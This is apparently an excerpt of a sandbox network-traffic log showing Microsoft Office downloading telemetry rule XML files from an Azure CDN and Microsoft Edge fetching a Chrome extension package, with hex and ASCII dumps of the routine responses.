2024-11-02 16:56:44 UTC	568	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: application/soap+xml; charset=utf-8 Expires: Sat, 02 Nov 2024 16:55:44 GMT P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" Referrer-Policy: strict-origin-when-cross-origin x-ms-route-info: C531_SN1 x-ms-request-id: b0ee04d0-59e0-4716-9a25-a97cc515b609 PPServer: PPV: 30 H: SN1PEPF0002F15F V: 0 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-XSS-Protection: 1; mode=block Date: Sat, 02 Nov 2024 16:56:44 GMT Connection: close Content-Length: 1276
2024-11-02 16:56:44 UTC	1276	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200

Session ID	Source IP	Source Port	Destination IP	Destination Port
106	192.168.2.7	49841	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:45 UTC	192	OUT	GET /rules/rule700400v2s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:45 UTC	517	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:45 GMT Content-Type: text/xml Content-Length: 1366 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT ETag: "0x8DC582BDB779FC3" x-ms-request-id: fe4e74db-301e-003f-25bc-2c266f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165645Z-16547b76f7fxsvjdhC1DFWprrs00000000w0000000006nrt x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:45 UTC	1366	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 30 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 65 6d 65 74 72 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2

Session ID	Source IP	Source Port	Destination IP	Destination Port
107	192.168.2.7	49838	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:45 UTC	192	OUT	GET /rules/rule702201v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:45 UTC	517	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:45 GMT Content-Type: text/xml Content-Length: 1397 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT ETag: "0x8DC582BE7262739" x-ms-request-id: 2ce7ce6f-901e-002a-1fd2-2c7a27000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165645Z-16547b76f7f7scqbhC1DFW0m5w00000000w000000000038y x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:45 UTC	1397	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel

Session ID	Source IP	Source Port	Destination IP	Destination Port
108	192.168.2.7	49839	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:45 UTC	192	OUT	GET /rules/rule702200v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:45 UTC	517	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:45 GMT Content-Type: text/xml Content-Length: 1360 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT ETag: "0x8DC582BDDEB5124" x-ms-request-id: 86fb53ab-501e-0078-4ed2-2c06cf000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165645Z-16547b76f7ftdm8dhC1DFWs13g00000000x0000000008g9k x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:45 UTC	1360	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 6c 4d 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
109	192.168.2.7	49842	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:45 UTC	192	OUT	GET /rules/rule700351v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:45 UTC	538	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:45 GMT Content-Type: text/xml Content-Length: 1397 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT ETag: "0x8DC582BDFD43C07" x-ms-request-id: ad01162d-901e-0064-5fc3-2ce8a6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165645Z-16547b76f7fq9mcrhC1DFWq15w00000000ug00000000hb5v x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:45 UTC	1397	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys

Session ID	Source IP	Source Port	Destination IP	Destination Port
110	192.168.2.7	49840	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:45 UTC	192	OUT	GET /rules/rule700401v2s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:45 UTC	517	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:45 GMT Content-Type: text/xml Content-Length: 1403 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT ETag: "0x8DC582BDCB4853F" x-ms-request-id: 4630a231-e01e-0020-14ff-2bde90000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165645Z-16547b76f7f67wxlhC1DFWah9w00000000sg00000000q0z8 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:45 UTC	1403	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 31 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
111	192.168.2.7	49856	172.217.16.129	443	7568	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:45 UTC	594	OUT	GET /crx/blobs/AYA8VyyVmiyWvldTRU0qGaR4RUSL6-YrG6uKRsMPsRWu4uzTWsENQ0Oe4TwjJlNxU5Vx3wW0XCsKQHAJ2XkWCO0eQ7UF3N9B6xg6w6N4ZQ_ezL5_s1EfR63s25vMOuhpdI4AxlKa5cntVqVuAOGwNK_pRVduNn5fPIzZ/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_83_1_0.crx HTTP/1.1 Host: clients2.googleusercontent.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-02 16:56:46 UTC	573	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Content-Length: 135771 X-GUploader-UploadID: AHmUCY02Ao73B-HNggRkDlQ2zX1fJgTZ9Cy0bFKfENEIpMfiAqAn0AVNQUwusSuijzDyfUciXdsPjU9new X-Goog-Hash: crc32c=5YFIVw== Server: UploadServer Date: Fri, 01 Nov 2024 20:33:29 GMT Expires: Sat, 01 Nov 2025 20:33:29 GMT Cache-Control: public, max-age=31536000 Age: 73396 Last-Modified: Tue, 22 Oct 2024 20:33:19 GMT ETag: a1239f8c_b608f476_b1045d58_830b10c8_3ed9cb2d Content-Type: application/x-chrome-extension Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-11-02 16:56:46 UTC	805	IN	Data Raw: 43 72 32 34 03 00 00 00 e2 15 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 9c 5e d1 18 b0 31 22 89 f4 fd 77 8d 67 83 0b 74 fd c3 32 4a 0e 47 31 00 29 58 34 b1 bf 3d 26 90 3f 5b 6a 2c 4c 7a fd d5 6a b0 75 cf 65 5b 49 85 71 2a 42 61 2f 58 dd ee dc 50 c1 68 fc cd 84 4c 04 88 b9 99 dc 32 25 33 5f 6f f4 ae b5 ad 19 0d d4 b8 48 f7 29 27 b9 3d d6 95 65 f8 ac c8 9c 3f 15 e6 ef 1f 08 ab 11 6a e1 a9 c8 33 55 48 fd 7c bf 58 8c 4d 06 e3 97 75 cc c2 9c 73 5b a6 2a f2 ea 3f 24 f3 9c db 8a 05 9f 46 25 11 1d 18 b4 49 08 19 94 80 29 08 f2 2c 2d c0 2f 90 65 35 29 a6 66 83 e7 4f e4 b2 71 14 5e ff 90 92 01 8d d3 bf ca a0 d0 39 a0 08 28 e3 d2 5f d5 70 68 32 fe 10 5e d5 59 42 50 58 66 5f 38 cc 0b 08 Data Ascii: Cr240"0H0^1"wgt2JG1)X4=&?[j,Lzjue[IqBa/XPhL2%3_oH)'=e?j3UH\|XMus[*?$F%I),-/e5)fOq^9(_ph2^YBPXf_8
2024-11-02 16:56:46 UTC	1378	IN	Data Raw: aa 54 89 36 c1 f8 f2 5a f7 ba 97 f1 3f fe f5 43 56 d7 f2 f3 3c 8c e7 4b ff e3 ef 3f c6 cf aa aa f3 6b fd 97 a1 fa fc cb e9 ac aa 1f 7f fd 71 3d bf f7 95 fc 59 5e fa b1 ea c7 1f 7f ff d7 8f 21 7f a8 4b 2e f5 e7 ab 47 d8 14 a6 6d 08 6e 1b a9 59 d7 a5 59 ab f2 b1 7f e2 d6 f5 9c 75 d3 57 66 8e a7 d2 54 4f 22 d9 3f a1 dd 8b 8d ce f7 b3 f0 55 2f 52 64 ec 9b cb 59 7f be 8e 1a 6a ee bf ff de a9 ab 48 a3 f3 51 8d bf ec 7b b7 96 fe fb f9 78 de 4f 51 f3 7e 2b 7d bb ff fe 4c d9 39 5f 12 3a 97 2c 45 97 ef ef 0b 13 71 f1 30 26 ce df 1f 49 3b 62 c4 e0 48 bb b1 11 3e ea f2 8e 02 39 b3 7d 09 42 84 80 d8 92 2e 7c e4 41 b8 a9 7c 61 8b 47 e8 1c 82 eb b9 f4 a1 91 6f f7 4f 7b e5 5c 0b 13 d5 85 cf e6 83 09 bb 83 09 54 69 a1 5a 98 fa ba 1b e6 c2 dc 9c 0f db f0 51 98 ce ef f3 fc Data Ascii: T6Z?CV<K?kq=Y^!K.GmnYYuWfTO"?U/RdYjHQ{xOQ~+}L9_:,Eq0&I;bH>9}B.\|A\|aGoO{\TiZQ
2024-11-02 16:56:46 UTC	1378	IN	Data Raw: 88 1b 77 cc 06 18 f9 d1 78 a4 43 22 82 21 af 78 ed e5 3b 17 31 63 f2 12 16 6f 58 13 8a ac 6b 1f 08 96 b6 8e 59 b4 c8 5e 7b ff 95 e3 e3 6c 66 93 48 75 bd 57 d8 44 86 61 51 06 73 e9 21 bf d8 c1 38 0f 10 8e 94 67 c9 ae de 62 0f 6a 0d 08 71 f9 00 01 36 e4 d7 e2 f8 fd 7e ad e7 de 90 39 1c a3 5e 29 61 4c ee 81 a2 7b 44 c7 8e 2a b9 2d 76 d2 4b 76 32 2c a9 88 31 c0 6e d9 6b 8d a6 5a 8f 18 9d a2 60 79 ed cb ff 87 06 97 0d 1e 32 a3 56 32 10 9f b9 a9 d2 c4 8b 46 12 b8 5e dc 88 5e 98 61 86 3b 1d 0a 96 7b 16 9e c8 68 27 de 4a 05 5d 6c ca cd 72 ee c9 b5 fc 47 ed 73 37 d8 17 1e 9a eb 56 7a a1 49 00 ec 50 20 44 6e 0c 07 32 6b 0d f0 31 8f 82 17 33 36 ef 77 16 e0 38 a3 78 57 75 ef f7 45 fe d6 da dc 1b 3c a4 60 9b 5a c3 ab 54 de 7c 84 75 4b 00 a2 d8 aa 43 dd 63 24 a2 05 b3 Data Ascii: wxC"!x;1coXkY^{lfHuWDaQs!8gbjq6~9^)aL{D*-vKv2,1nkZ`y2V2F^^a;{h'J]lrGs7VzIP Dn2k136w8xWuE<`ZT\|uKCc$
2024-11-02 16:56:46 UTC	1378	IN	Data Raw: ec 3c 53 7b bd 2b 0d f6 8f 48 d5 27 4c 9d 21 67 cf 13 d5 fd 28 ef 16 fb ab 5b b1 72 6f 45 f7 8a 4f da b3 e7 94 c8 03 e1 ba 8f ea 98 8d ad 70 5b 75 d3 db 31 31 1e 65 20 3f 73 03 a7 8c c0 5d 02 07 98 cf a2 15 9d ee 3b 96 d8 5b 6e bd d6 e7 1c e9 c6 a6 3c ec 04 df 03 02 d8 07 6a 07 4f 70 bb e6 0d 44 84 8e 31 f6 ed 1b e9 6a c5 3d 68 26 0c d9 55 07 3f b0 8e cd 25 f6 a5 bf 92 bd 1a 68 de 40 51 36 ee b9 e4 ce 81 50 6c c6 16 de 88 4e bc 66 c4 fd 22 da f5 e3 d6 a9 11 77 1e cc c8 00 69 9f 41 62 95 20 df bd 2c b1 bf 6b be 5b ba 52 77 ca c0 9b 04 7c b7 44 3b 68 e6 61 cf 76 78 4c 3a 74 24 9e d6 21 da de bf f7 1b 89 3f 5c 33 4b 7c e7 5f 9b f5 e1 23 f2 f7 8f ff 83 bf 91 02 97 ae 8d 7f 06 9c bd 4c 5d 83 7b e3 6b 6c 38 41 a1 10 8f 67 d6 26 30 9e 29 6c 6d ce c7 a7 68 e7 66 Data Ascii: <S{+H'L!g([roEOp[u11e ?s];[n<jOpD1j=h&U?%h@Q6PlNf"wiAb ,k[Rw\|D;havxL:t$!?\3K\|_#L]{kl8Ag&0)lmhf
2024-11-02 16:56:46 UTC	1378	IN	Data Raw: 73 be d1 73 8f fe f4 bd 21 33 d5 4d 7a 30 92 e6 a0 73 01 69 4f 6c e7 64 e7 06 c4 1f cd ca 43 29 99 d5 a9 e4 d2 27 1d 24 47 c6 70 b9 db 83 b8 ff e3 7b 43 fd 1c bd 60 8e 2a b8 9e 3b 74 be 19 0c 65 10 ff b7 71 9b 03 75 c2 bc 05 66 42 30 d4 bd 44 4c 1f e0 98 f8 e0 5e 51 d6 09 16 ee 62 8a 41 64 da 7a 3d 5a 33 a2 f1 1d 19 2a c9 80 f3 07 8d 29 4d f6 90 9d 6a f4 d8 56 61 85 9f 3a ce 4e 59 a7 6e a9 e5 ea 31 ff db f8 7b 43 fb aa 2b b5 c2 4c a8 10 57 3e 9d 12 73 e0 51 5f ef a3 40 64 48 ab 09 6b 6a 14 35 a1 2f 83 cb 26 d1 e4 cb 9d b8 cb 6e d2 3d 1d 90 fa 7e 9d 1e 6b cc d2 f8 7b 2e c6 37 f3 df 63 e9 ba ef fe 7d de f2 f4 a7 e7 2c 7f fb ee 20 7d 36 a6 a6 6a 7f 3b 2b 59 eb 18 b5 6f b9 8e 0b c1 c7 7b c1 1d 95 99 f6 ad e8 d4 b5 e8 6c ed 3f a7 af c2 af 3f 73 bf 3d ff ef 77 Data Ascii: ss!3Mz0siOldC)'$Gp{C`;tequfB0DL^QbAdz=Z3)MjVa:NYn1{C+LW>sQ_@dHkj5/&n=~k{.7c}, }6j;+Yo{l??s=w
2024-11-02 16:56:46 UTC	1378	IN	Data Raw: 03 04 14 00 08 08 08 00 00 00 21 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 2d 00 5f 6c 6f 63 61 6c 65 73 2f 73 76 2f 6d 65 73 73 61 67 65 73 2e 6a 73 6f 6e 55 54 05 00 01 50 03 fc 66 0a 00 20 00 00 00 00 00 01 00 18 00 00 08 b1 f4 0b 14 db 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8d 52 3d 6f dc 30 0c dd fb 2b 08 cf 46 70 fd 1c b2 05 08 d0 a1 45 53 a4 59 02 64 61 4e b4 23 48 a6 04 8a 72 72 08 f2 df 4b 9d 7d 08 ce e8 d0 45 03 45 be f7 f8 1e 5f bb bd 10 2a 31 3d 77 97 af dd 44 a5 e0 48 dd 65 f7 e7 c7 d5 ef 2b f8 75 7f 77 d7 bd f5 1d bd e4 88 8c ea 13 a7 61 88 9e c9 f9 82 8f 91 dc f9 d4 75 85 87 ba db d1 17 81 b5 ef 02 6e 26 70 15 66 1f 23 20 cf cb 37 3b 84 ef 29 8d 91 e0 3a 85 3a 11 2b 54 45 06 cf 4a c2 a4 35 e7 90 72 36 84 b1 3f 42 0e df 72 66 Data Ascii: !-_locales/sv/messages.jsonUTPf R=o0+FpESYdaN#HrrK}EE_*1=wDHe+uwaun&pf# 7;)::+TEJ5r6?Brf
2024-11-02 16:56:46 UTC	1378	IN	Data Raw: d6 92 10 e8 84 d6 9a 4c 28 b9 28 68 15 81 3d 3a d0 47 7f 87 f5 aa c5 a0 2c 48 96 b4 9f 93 24 bf 74 ca 3b a4 a0 f9 6a e6 a1 cc 40 81 91 19 30 5d a1 39 7e 39 01 48 39 a0 4f 22 d8 2a e1 e0 08 be e7 cf 6d 6c b8 0b be c9 03 07 28 7d 6a dc e2 3f 42 98 78 2d d6 a1 b1 19 12 f8 68 b4 04 85 9d 97 35 1c 1b 0c 16 5f 55 b4 c5 fe ea 43 28 83 0e 40 08 bf 0d 79 16 7a c3 cf 26 b0 46 00 0e 4b 9e 50 f8 ed 3b 0e 8c 5d 3c 0b 64 ca 72 2e 90 41 1f b1 d4 e7 ed 22 33 dd 46 8d 4d 1a 99 c7 e4 99 3c 21 86 b1 e4 d2 54 27 cf df ef 91 4e 01 0d 30 81 96 55 96 37 4e 3d d0 01 5c b2 ca 55 80 04 ec aa e2 2a 73 90 6b ac 51 58 5b 6a 0a 34 8b b4 b7 4f b0 0d b9 c6 2c a1 85 38 3d c9 71 2f 07 ef 6d df 60 8f b9 82 8c 87 80 43 e8 d4 88 fe 62 9f b4 94 b9 d7 66 ac 7c 82 88 1d 51 d1 f9 61 37 fe 39 d8 Data Ascii: L((h=:G,H$t;j@0]9~9H9O"ml(}j?Bx-h5_UC(@yz&FKP;]<dr.A"3FM<!T'N0U7N=\UskQX[j4O,8=q/m`Cbf\|Qa79
2024-11-02 16:56:46 UTC	1378	IN	Data Raw: ad c4 ca 60 aa 12 70 5b 7b 7a c3 30 ec 7c ed 63 70 f3 2d c2 2b 61 1b 8f d7 00 1b e0 cd 2b ef 78 f7 a3 67 c0 39 32 a9 1f 80 6c 66 17 97 d6 80 80 69 32 ab bf c3 f0 d2 d1 02 c6 d1 d1 ca 7f 28 f3 d3 05 cf d7 e6 67 96 67 73 39 3b dd 9e 5f c5 2e 08 52 5b 60 e6 23 e4 24 80 17 de cf 8c 32 61 22 26 18 40 81 51 37 1a 3d e4 69 36 45 18 6c 38 96 b1 f8 bc 04 25 63 8c 69 6f 0b 8e 93 22 11 da 2b e2 2e dd 3c 66 df 7d 3c c4 05 36 71 e2 c9 b8 a6 7e 66 b3 9b 73 21 3a a7 95 67 38 d4 83 89 c3 d7 91 64 de c5 5b 01 f5 ff a5 13 58 78 d8 a8 54 25 22 24 d8 16 40 cd 81 70 5e c5 3b d8 dd 55 72 b8 9e d6 48 15 06 41 57 68 5b e8 27 30 b1 82 0f e8 09 d8 f8 24 0d ae 73 05 91 20 6f 32 84 0d f0 82 95 ca 25 80 50 f5 46 fa 49 1e 46 5e 38 4e d2 28 ef db ce 9f 18 54 a7 c3 53 4b c7 26 a2 ba e4 Data Ascii: `p[{z0\|cp-+a+xg92lfi2(ggs9;_.R[`#$2a"&@Q7=i6El8%cio"+.<f}<6q~fs!:g8d[XxT%"$@p^;UrHAWh['0$s o2%PFIF^8N(TSK&
